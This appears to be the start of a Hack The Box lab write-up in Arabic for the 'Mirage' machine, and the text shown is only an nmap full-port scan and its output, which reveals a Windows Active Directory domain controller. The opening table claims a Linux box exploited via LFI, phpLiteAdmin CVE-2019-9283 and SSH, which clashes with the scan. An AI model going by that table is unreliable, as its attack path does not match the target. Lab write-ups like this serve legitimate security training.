| 💻 المنصة | Hack The Box |
| 🔗 الرابط | اضغط هنا |
| 🖥️ نظام التشغيل | Linux |
| 🎯 الصعوبة | صعبة |
| 🧠TTPs (طرق وتقنيات) | استكشاف الخدمات (Enumeration) تحليل صفحات ويب واستغلال LFI استخراج بيانات اعتماد من ملفات الباك اند استغلال phpLiteAdmin (CVE-2019-9283) الوصول إلى الحاسوب عبر SSH تصعيد الصلاحيات عبر exploit محلي |
1. Enumeration – الاستكشاف
Nmap scan
نبدو بـ nmap سكان شامل، نخليوه يخدم على كامل البورتات -p-.
نستعملو -A -sCV باش يعطينا معلومات تقنية على الخدمات (OS، version، و script results).
هادي الخطوة تعطينا “خريطة” أولية
<code>nmap -A -T4 -p- -Pn -sCV -vvv -oN mirage.nmap $Machine_IP</code># Nmap 7.95 scan initiated Sun Jul 20 00:08:09 2025 as: /usr/lib/nmap/nmap -A -T4 -p- -Pn -sCV -vvv -oN mirage.nmap 10.129.60.250
Increasing send delay for 10.129.60.250 from 5 to 10 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 10.129.60.250 (10.129.60.250)
Host is up, received user-set (0.053s latency).
Scanned at 2025-07-20 00:08:09 CET for 226s
Not shown: 65505 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-07-20 06:10:13Z)
111/tcp open rpcbind syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Issuer: commonName=mirage-DC01-CA/domainComponent=mirage
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-04T19:58:41
| Not valid after: 2105-07-04T19:58:41
| MD5: da96:ee88:7537:0dcf:1bd4:4aa3:2104:5393
| SHA-1: c25a:58cc:950f:ce6e:64c7:cd40:e98e:bb5a:653f:b9ff
| -----BEGIN CERTIFICATE-----
| MIIF7DCCBNSgAwIBAgITSQAAAAmly5tE1w7/PwABAAAACTANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGbWlyYWdl
| MRcwFQYDVQQDEw5taXJhZ2UtREMwMS1DQTAgFw0yNTA3MDQxOTU4NDFaGA8yMTA1
| MDcwNDE5NTg0MVowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALa/
| UqJSM0syaGI7mm4Lr9IL/U/MhGhXROelD/gGqiTHoDgDAugm6/pqICUKvJJNfX8S
| 5Npt0EGfwOPT4orzfEBneKPwywSRrPw1ciJ2wtGcQnWgMMP8/HdgHyW1Gl2L66Gk
| W2th/k2NzPnTQW2C5bt3/JDjaLYpIYyPdMygLlfHH1LAilEed6ozrRrW08rXvTXM
| xw6AqFYZr0yoE6KDHTO/ZgKcMF7YPDeOaA3c2ldCOYnxuTbI9GPzYzPvdU7cKQFj
| tFL2oce7l8bsPAsyPPoXZrGjxLpyPyQTS1ro0xyrRAze/qlPpcXck8P9Zz8K/n3I
| WPsovpeg2m0lnLa2bmkCAwEAAaOCAxUwggMRMDUGCSsGAQQBgjcVBwQoMCYGHisG
| AQQBgjcVCMjXb5WWb4ShjTGC+KE0g9nnbiwBIQIBbgIBADAyBgNVHSUEKzApBggr
| BgEFBQcDAgYIKwYBBQUHAwEGCisGAQQBgjcUAgIGBysGAQUCAwUwDgYDVR0PAQH/
| BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwEw
| DAYKKwYBBAGCNxQCAjAJBgcrBgEFAgMFMB0GA1UdDgQWBBT/gvokffsC/s7mtzMs
| 6SqQe6+ThzAfBgNVHSMEGDAWgBTJ+IdMlVv6ldc/u1Z6Kjb0idAthzCBywYDVR0f
| BIHDMIHAMIG9oIG6oIG3hoG0bGRhcDovLy9DTj1taXJhZ2UtREMwMS1DQSgxKSxD
| Tj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2
| aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1odGI/Y2VydGlmaWNh
| dGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
| blBvaW50MIG/BggrBgEFBQcBAQSBsjCBrzCBrAYIKwYBBQUHMAKGgZ9sZGFwOi8v
| L0NOPW1pcmFnZS1EQzAxLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2
| aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1o
| dGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25B
| dXRob3JpdHkwMQYDVR0RAQH/BCcwJYIPZGMwMS5taXJhZ2UuaHRiggptaXJhZ2Uu
| aHRiggZNSVJBR0UwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAELlMt
| MS01LTIxLTIxMjcxNjM0NzEtMzgyNDcyMTgzNC0yNTY4MzY1MTA5LTEwMDAwDQYJ
| KoZIhvcNAQELBQADggEBAG38vHTJ2FmA2Z/wHABxLDIpQHEns0U2n7SbyGQ//7NQ
| G7buS1JmPLajj4OC0Kzoy7bEbrtcWApVxRwFHoAQHmUH0RlQEhcOxXoWEMLVgTil
| FfP+pf4dWfu4l1cZq/uFguc4nVbNgCkZPZo1bC6s0UJcaM4ylPkPED5L+WWeirFV
| 24r7DPZj4V9UaE1/Hklli6J9RhIU1rTZZHixKDCAGNTIZ5HiaTO6MhmEyS5z2yIY
| C8UJBHDnKSfMZhG+z2VnoRlPK8i0oNg8DL2SzlxmAVjlSdpvz+Q9wTFWhgepH5P8
| rpwi2htMcsDvYoIjkMtm2AjeGJkI1q5Cb2L0f+wl/FU=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Issuer: commonName=mirage-DC01-CA/domainComponent=mirage
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-04T19:58:41
| Not valid after: 2105-07-04T19:58:41
| MD5: da96:ee88:7537:0dcf:1bd4:4aa3:2104:5393
| SHA-1: c25a:58cc:950f:ce6e:64c7:cd40:e98e:bb5a:653f:b9ff
| -----BEGIN CERTIFICATE-----
| MIIF7DCCBNSgAwIBAgITSQAAAAmly5tE1w7/PwABAAAACTANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGbWlyYWdl
| MRcwFQYDVQQDEw5taXJhZ2UtREMwMS1DQTAgFw0yNTA3MDQxOTU4NDFaGA8yMTA1
| MDcwNDE5NTg0MVowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALa/
| UqJSM0syaGI7mm4Lr9IL/U/MhGhXROelD/gGqiTHoDgDAugm6/pqICUKvJJNfX8S
| 5Npt0EGfwOPT4orzfEBneKPwywSRrPw1ciJ2wtGcQnWgMMP8/HdgHyW1Gl2L66Gk
| W2th/k2NzPnTQW2C5bt3/JDjaLYpIYyPdMygLlfHH1LAilEed6ozrRrW08rXvTXM
| xw6AqFYZr0yoE6KDHTO/ZgKcMF7YPDeOaA3c2ldCOYnxuTbI9GPzYzPvdU7cKQFj
| tFL2oce7l8bsPAsyPPoXZrGjxLpyPyQTS1ro0xyrRAze/qlPpcXck8P9Zz8K/n3I
| WPsovpeg2m0lnLa2bmkCAwEAAaOCAxUwggMRMDUGCSsGAQQBgjcVBwQoMCYGHisG
| AQQBgjcVCMjXb5WWb4ShjTGC+KE0g9nnbiwBIQIBbgIBADAyBgNVHSUEKzApBggr
| BgEFBQcDAgYIKwYBBQUHAwEGCisGAQQBgjcUAgIGBysGAQUCAwUwDgYDVR0PAQH/
| BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwEw
| DAYKKwYBBAGCNxQCAjAJBgcrBgEFAgMFMB0GA1UdDgQWBBT/gvokffsC/s7mtzMs
| 6SqQe6+ThzAfBgNVHSMEGDAWgBTJ+IdMlVv6ldc/u1Z6Kjb0idAthzCBywYDVR0f
| BIHDMIHAMIG9oIG6oIG3hoG0bGRhcDovLy9DTj1taXJhZ2UtREMwMS1DQSgxKSxD
| Tj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2
| aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1odGI/Y2VydGlmaWNh
| dGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
| blBvaW50MIG/BggrBgEFBQcBAQSBsjCBrzCBrAYIKwYBBQUHMAKGgZ9sZGFwOi8v
| L0NOPW1pcmFnZS1EQzAxLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2
| aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1o
| dGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25B
| dXRob3JpdHkwMQYDVR0RAQH/BCcwJYIPZGMwMS5taXJhZ2UuaHRiggptaXJhZ2Uu
| aHRiggZNSVJBR0UwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAELlMt
| MS01LTIxLTIxMjcxNjM0NzEtMzgyNDcyMTgzNC0yNTY4MzY1MTA5LTEwMDAwDQYJ
| KoZIhvcNAQELBQADggEBAG38vHTJ2FmA2Z/wHABxLDIpQHEns0U2n7SbyGQ//7NQ
| G7buS1JmPLajj4OC0Kzoy7bEbrtcWApVxRwFHoAQHmUH0RlQEhcOxXoWEMLVgTil
| FfP+pf4dWfu4l1cZq/uFguc4nVbNgCkZPZo1bC6s0UJcaM4ylPkPED5L+WWeirFV
| 24r7DPZj4V9UaE1/Hklli6J9RhIU1rTZZHixKDCAGNTIZ5HiaTO6MhmEyS5z2yIY
| C8UJBHDnKSfMZhG+z2VnoRlPK8i0oNg8DL2SzlxmAVjlSdpvz+Q9wTFWhgepH5P8
| rpwi2htMcsDvYoIjkMtm2AjeGJkI1q5Cb2L0f+wl/FU=
|_-----END CERTIFICATE-----
2049/tcp open nlockmgr syn-ack ttl 127 1-4 (RPC #100021)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Issuer: commonName=mirage-DC01-CA/domainComponent=mirage
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-04T19:58:41
| Not valid after: 2105-07-04T19:58:41
| MD5: da96:ee88:7537:0dcf:1bd4:4aa3:2104:5393
| SHA-1: c25a:58cc:950f:ce6e:64c7:cd40:e98e:bb5a:653f:b9ff
| -----BEGIN CERTIFICATE-----
| MIIF7DCCBNSgAwIBAgITSQAAAAmly5tE1w7/PwABAAAACTANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGbWlyYWdl
| MRcwFQYDVQQDEw5taXJhZ2UtREMwMS1DQTAgFw0yNTA3MDQxOTU4NDFaGA8yMTA1
| MDcwNDE5NTg0MVowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALa/
| UqJSM0syaGI7mm4Lr9IL/U/MhGhXROelD/gGqiTHoDgDAugm6/pqICUKvJJNfX8S
| 5Npt0EGfwOPT4orzfEBneKPwywSRrPw1ciJ2wtGcQnWgMMP8/HdgHyW1Gl2L66Gk
| W2th/k2NzPnTQW2C5bt3/JDjaLYpIYyPdMygLlfHH1LAilEed6ozrRrW08rXvTXM
| xw6AqFYZr0yoE6KDHTO/ZgKcMF7YPDeOaA3c2ldCOYnxuTbI9GPzYzPvdU7cKQFj
| tFL2oce7l8bsPAsyPPoXZrGjxLpyPyQTS1ro0xyrRAze/qlPpcXck8P9Zz8K/n3I
| WPsovpeg2m0lnLa2bmkCAwEAAaOCAxUwggMRMDUGCSsGAQQBgjcVBwQoMCYGHisG
| AQQBgjcVCMjXb5WWb4ShjTGC+KE0g9nnbiwBIQIBbgIBADAyBgNVHSUEKzApBggr
| BgEFBQcDAgYIKwYBBQUHAwEGCisGAQQBgjcUAgIGBysGAQUCAwUwDgYDVR0PAQH/
| BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwEw
| DAYKKwYBBAGCNxQCAjAJBgcrBgEFAgMFMB0GA1UdDgQWBBT/gvokffsC/s7mtzMs
| 6SqQe6+ThzAfBgNVHSMEGDAWgBTJ+IdMlVv6ldc/u1Z6Kjb0idAthzCBywYDVR0f
| BIHDMIHAMIG9oIG6oIG3hoG0bGRhcDovLy9DTj1taXJhZ2UtREMwMS1DQSgxKSxD
| Tj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2
| aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1odGI/Y2VydGlmaWNh
| dGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
| blBvaW50MIG/BggrBgEFBQcBAQSBsjCBrzCBrAYIKwYBBQUHMAKGgZ9sZGFwOi8v
| L0NOPW1pcmFnZS1EQzAxLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2
| aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1o
| dGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25B
| dXRob3JpdHkwMQYDVR0RAQH/BCcwJYIPZGMwMS5taXJhZ2UuaHRiggptaXJhZ2Uu
| aHRiggZNSVJBR0UwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAELlMt
| MS01LTIxLTIxMjcxNjM0NzEtMzgyNDcyMTgzNC0yNTY4MzY1MTA5LTEwMDAwDQYJ
| KoZIhvcNAQELBQADggEBAG38vHTJ2FmA2Z/wHABxLDIpQHEns0U2n7SbyGQ//7NQ
| G7buS1JmPLajj4OC0Kzoy7bEbrtcWApVxRwFHoAQHmUH0RlQEhcOxXoWEMLVgTil
| FfP+pf4dWfu4l1cZq/uFguc4nVbNgCkZPZo1bC6s0UJcaM4ylPkPED5L+WWeirFV
| 24r7DPZj4V9UaE1/Hklli6J9RhIU1rTZZHixKDCAGNTIZ5HiaTO6MhmEyS5z2yIY
| C8UJBHDnKSfMZhG+z2VnoRlPK8i0oNg8DL2SzlxmAVjlSdpvz+Q9wTFWhgepH5P8
| rpwi2htMcsDvYoIjkMtm2AjeGJkI1q5Cb2L0f+wl/FU=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Issuer: commonName=mirage-DC01-CA/domainComponent=mirage
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-04T19:58:41
| Not valid after: 2105-07-04T19:58:41
| MD5: da96:ee88:7537:0dcf:1bd4:4aa3:2104:5393
| SHA-1: c25a:58cc:950f:ce6e:64c7:cd40:e98e:bb5a:653f:b9ff
| -----BEGIN CERTIFICATE-----
| MIIF7DCCBNSgAwIBAgITSQAAAAmly5tE1w7/PwABAAAACTANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGbWlyYWdl
| MRcwFQYDVQQDEw5taXJhZ2UtREMwMS1DQTAgFw0yNTA3MDQxOTU4NDFaGA8yMTA1
| MDcwNDE5NTg0MVowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALa/
| UqJSM0syaGI7mm4Lr9IL/U/MhGhXROelD/gGqiTHoDgDAugm6/pqICUKvJJNfX8S
| 5Npt0EGfwOPT4orzfEBneKPwywSRrPw1ciJ2wtGcQnWgMMP8/HdgHyW1Gl2L66Gk
| W2th/k2NzPnTQW2C5bt3/JDjaLYpIYyPdMygLlfHH1LAilEed6ozrRrW08rXvTXM
| xw6AqFYZr0yoE6KDHTO/ZgKcMF7YPDeOaA3c2ldCOYnxuTbI9GPzYzPvdU7cKQFj
| tFL2oce7l8bsPAsyPPoXZrGjxLpyPyQTS1ro0xyrRAze/qlPpcXck8P9Zz8K/n3I
| WPsovpeg2m0lnLa2bmkCAwEAAaOCAxUwggMRMDUGCSsGAQQBgjcVBwQoMCYGHisG
| AQQBgjcVCMjXb5WWb4ShjTGC+KE0g9nnbiwBIQIBbgIBADAyBgNVHSUEKzApBggr
| BgEFBQcDAgYIKwYBBQUHAwEGCisGAQQBgjcUAgIGBysGAQUCAwUwDgYDVR0PAQH/
| BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwEw
| DAYKKwYBBAGCNxQCAjAJBgcrBgEFAgMFMB0GA1UdDgQWBBT/gvokffsC/s7mtzMs
| 6SqQe6+ThzAfBgNVHSMEGDAWgBTJ+IdMlVv6ldc/u1Z6Kjb0idAthzCBywYDVR0f
| BIHDMIHAMIG9oIG6oIG3hoG0bGRhcDovLy9DTj1taXJhZ2UtREMwMS1DQSgxKSxD
| Tj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2
| aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1odGI/Y2VydGlmaWNh
| dGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
| blBvaW50MIG/BggrBgEFBQcBAQSBsjCBrzCBrAYIKwYBBQUHMAKGgZ9sZGFwOi8v
| L0NOPW1pcmFnZS1EQzAxLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2
| aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1o
| dGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25B
| dXRob3JpdHkwMQYDVR0RAQH/BCcwJYIPZGMwMS5taXJhZ2UuaHRiggptaXJhZ2Uu
| aHRiggZNSVJBR0UwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAELlMt
| MS01LTIxLTIxMjcxNjM0NzEtMzgyNDcyMTgzNC0yNTY4MzY1MTA5LTEwMDAwDQYJ
| KoZIhvcNAQELBQADggEBAG38vHTJ2FmA2Z/wHABxLDIpQHEns0U2n7SbyGQ//7NQ
| G7buS1JmPLajj4OC0Kzoy7bEbrtcWApVxRwFHoAQHmUH0RlQEhcOxXoWEMLVgTil
| FfP+pf4dWfu4l1cZq/uFguc4nVbNgCkZPZo1bC6s0UJcaM4ylPkPED5L+WWeirFV
| 24r7DPZj4V9UaE1/Hklli6J9RhIU1rTZZHixKDCAGNTIZ5HiaTO6MhmEyS5z2yIY
| C8UJBHDnKSfMZhG+z2VnoRlPK8i0oNg8DL2SzlxmAVjlSdpvz+Q9wTFWhgepH5P8
| rpwi2htMcsDvYoIjkMtm2AjeGJkI1q5Cb2L0f+wl/FU=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
4222/tcp open vrml-multi-use? syn-ack ttl 127
| fingerprint-strings:
| GenericLines:
| INFO {"server_id":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","server_name":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":145,"client_ip":"10.10.x.x","xkey":"XBB7UBHM5SUEXPWR2ZVUVEIRYXY7YYMNHR4P3R24L67IQML7JC5DTK7A"}
| -ERR 'Authorization Violation'
| GetRequest:
| INFO {"server_id":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","server_name":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":146,"client_ip":"10.10.x.x","xkey":"XBB7UBHM5SUEXPWR2ZVUVEIRYXY7YYMNHR4P3R24L67IQML7JC5DTK7A"}
| -ERR 'Authorization Violation'
| HTTPOptions:
| INFO {"server_id":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","server_name":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":147,"client_ip":"10.10.x.x","xkey":"XBB7UBHM5SUEXPWR2ZVUVEIRYXY7YYMNHR4P3R24L67IQML7JC5DTK7A"}
| -ERR 'Authorization Violation'
| NULL:
| INFO {"server_id":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","server_name":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":144,"client_ip":"10.10.x.x","xkey":"XBB7UBHM5SUEXPWR2ZVUVEIRYXY7YYMNHR4P3R24L67IQML7JC5DTK7A"}
|_ -ERR 'Authentication Timeout'
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49436/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49443/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49444/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49459/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51947/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51964/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51975/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
57464/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4222-TCP:V=7.95%I=7%D=7/20%Time=687C25D2%P=x86_64-pc-linux-gnu%r(NU
SF:LL,1CF,"INFO\x20{\"server_id\":\"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE6
SF:7R75BKDL3PSLIGPTN6\",\"server_name\":\"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC6
SF:7KSFE67R75BKDL3PSLIGPTN6\",\"version\":\"2\.11\.3\",\"proto\":1,\"git_c
SF:ommit\":\"a82cfda\",\"go\":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"por
SF:t\":4222,\"headers\":true,\"auth_required\":true,\"max_payload\":104857
SF:6,\"jetstream\":true,\"client_id\":144,\"client_ip\":\"10\.10\.14\.2\",
SF:\"xkey\":\"XBB7UBHM5SUEXPWR2ZVUVEIRYXY7YYMNHR4P3R24L67IQML7JC5DTK7A\"}\
SF:x20\r\n-ERR\x20'Authentication\x20Timeout'\r\n")%r(GenericLines,1D0,"IN
SF:FO\x20{\"server_id\":\"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3P
SF:SLIGPTN6\",\"server_name\":\"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75
SF:BKDL3PSLIGPTN6\",\"version\":\"2\.11\.3\",\"proto\":1,\"git_commit\":\"
SF:a82cfda\",\"go\":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"port\":4222,\
SF:"headers\":true,\"auth_required\":true,\"max_payload\":1048576,\"jetstr
SF:eam\":true,\"client_id\":145,\"client_ip\":\"10\.10\.14\.2\",\"xkey\":\
SF:"XBB7UBHM5SUEXPWR2ZVUVEIRYXY7YYMNHR4P3R24L67IQML7JC5DTK7A\"}\x20\r\n-ER
SF:R\x20'Authorization\x20Violation'\r\n")%r(GetRequest,1D0,"INFO\x20{\"se
SF:rver_id\":\"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6\",
SF:\"server_name\":\"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGP
SF:TN6\",\"version\":\"2\.11\.3\",\"proto\":1,\"git_commit\":\"a82cfda\",\
SF:"go\":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"port\":4222,\"headers\":
SF:true,\"auth_required\":true,\"max_payload\":1048576,\"jetstream\":true,
SF:\"client_id\":146,\"client_ip\":\"10\.10\.14\.2\",\"xkey\":\"XBB7UBHM5S
SF:UEXPWR2ZVUVEIRYXY7YYMNHR4P3R24L67IQML7JC5DTK7A\"}\x20\r\n-ERR\x20'Autho
SF:rization\x20Violation'\r\n")%r(HTTPOptions,1D0,"INFO\x20{\"server_id\":
SF:\"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6\",\"server_n
SF:ame\":\"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6\",\"ve
SF:rsion\":\"2\.11\.3\",\"proto\":1,\"git_commit\":\"a82cfda\",\"go\":\"go
SF:1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"port\":4222,\"headers\":true,\"aut
SF:h_required\":true,\"max_payload\":1048576,\"jetstream\":true,\"client_i
SF:d\":147,\"client_ip\":\"10\.10\.14\.2\",\"xkey\":\"XBB7UBHM5SUEXPWR2ZVU
SF:VEIRYXY7YYMNHR4P3R24L67IQML7JC5DTK7A\"}\x20\r\n-ERR\x20'Authorization\x
SF:20Violation'\r\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
